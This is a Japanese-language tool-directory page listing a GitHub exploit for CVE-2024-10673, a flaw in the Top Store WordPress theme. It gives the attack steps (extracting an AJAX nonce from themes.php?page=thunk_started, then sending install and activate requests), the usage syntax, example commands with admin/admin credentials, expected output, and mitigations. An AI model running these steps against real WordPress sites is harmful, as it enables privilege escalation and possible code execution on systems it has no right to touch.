Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-10673 — Top Store <= 1.5.4 - Authenticated (Subscriber+) 任意のプラグインのインストール/有効化 | Kitploit
ツール/GitHubGitHub/nxploited/cve-2024-10673
特権昇格脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト
GitHubnxploited/cve-2024-10673

CVE-2024-10673

Top Store <= 1.5.4 - Authenticated (Subscriber+) 任意のプラグインのインストール/有効化

リポジトリを見る
111年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🔥 概要

このスクリプトは CVE-2024-10673 を悪用します。これは Top Store WordPress テーマ (<= 1.5.4) に見つかった重大な脆弱性です。この欠陥により、購読者以上のアクセス権を持つ認証済みユーザー が、保護されていない AJAX リクエストを介して任意のプラグインをインストールおよび有効化できるようになります。

⚠️ 重大性と影響

  • 認証なしのプラグインインストール: 購読者権限を持つ攻撃者は、管理者の承認なしにプラグインをインストールできます。
  • リモートコード実行 (RCE) の可能性: 悪意のあるプラグインがインストールされた場合、攻撃者は任意のコードを実行する可能性があります。
  • 権限昇格: 攻撃者は管理者アクセスを付与するプラグインをインストールできます。

🛠️ このエクスプロイトの機能

  • 必要な nonce を動的に抽出することで攻撃を自動化します。
  • プラグインの選択が可能 (ユーザーはインストールおよび有効化するプラグインを指定できます)。
  • 構造化ログのためにJSON形式の応答をサポートします。
  • エラーを適切に処理し、堅牢な実行を保証します。

⚡ エクスプロイトの仕組み

  1. 有効な認証情報を使用してWordPressにログインします。
  2. themes.php?page=thunk_started からAJAX nonce を抽出します。
  3. AJAXリクエストを送信してプラグインをインストールします (デフォルト: hunk-companion またはユーザー定義のプラグイン)。
  4. 別のリクエストを送信してプラグインを有効化します。
  5. 成功または失敗を示すJSON応答を出力します。

🚀 使用方法

root@kitploit:~
usage: u.py [-h] -u URL -un USERNAME -p PASSWORD [-pl PLUGIN]

Exploit CVE-2024-10673 - WordPress Plugin Installation & Activation by : # By Nxploit | Khaled Alenazi

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target WordPress URL (e.g., http://192.168.100.74:888/wordpress)
  -un USERNAME, --username USERNAME
                        WordPress Username
  -p PASSWORD, --password PASSWORD
                        WordPress Password
  -pl PLUGIN, --plugin PLUGIN
                        Plugin slug to install and activate (default: hunk-companion)

例

  • デフォルトプラグイン (hunk-companion) をインストールして有効化:
    root@kitploit:~
    python exploit.py -u http://192.168.100.74:888/wordpress -un admin -p admin
    
  • 特定のプラグイン (woocommerce) をインストールして有効化:
    root@kitploit:~
    python CVE-2024-10673.py -u http://192.168.100.74:888/wordpress -un admin -p admin -pl woocommerce
    

📝 期待される出力

root@kitploit:~
{"Logged in successfully"}
{"Fetching nonce value..."}
{"Nonce extracted": "abc123"}
{"Installing plugin: woocommerce..."}
{"Plugin woocommerce installed successfully"}
{"Activating plugin: woocommerce..."}
{"Plugin woocommerce activated successfully"}
{"Exploit completed successfully!"}

🔒 緩和策

WordPress サイトを保護するには:

  • Top Store テーマのパッチ適用済みバージョンに更新します。
  • 不要なアクセスを防ぐために購読者の権限を制限します。
  • 不正な変更がないかインストールされたプラグインを監視します。
  • 管理者以外のプラグインインストールを無効化します。

⚠️ 免責事項

このスクリプトは教育およびセキュリティ研究目的のみです。 所有していない、または明示的なテスト許可がないシステムに対する不正使用は違法です。責任を持って使用してください!

作成者: Khaled Alenazi (Nxploit)

ツールをダウンロード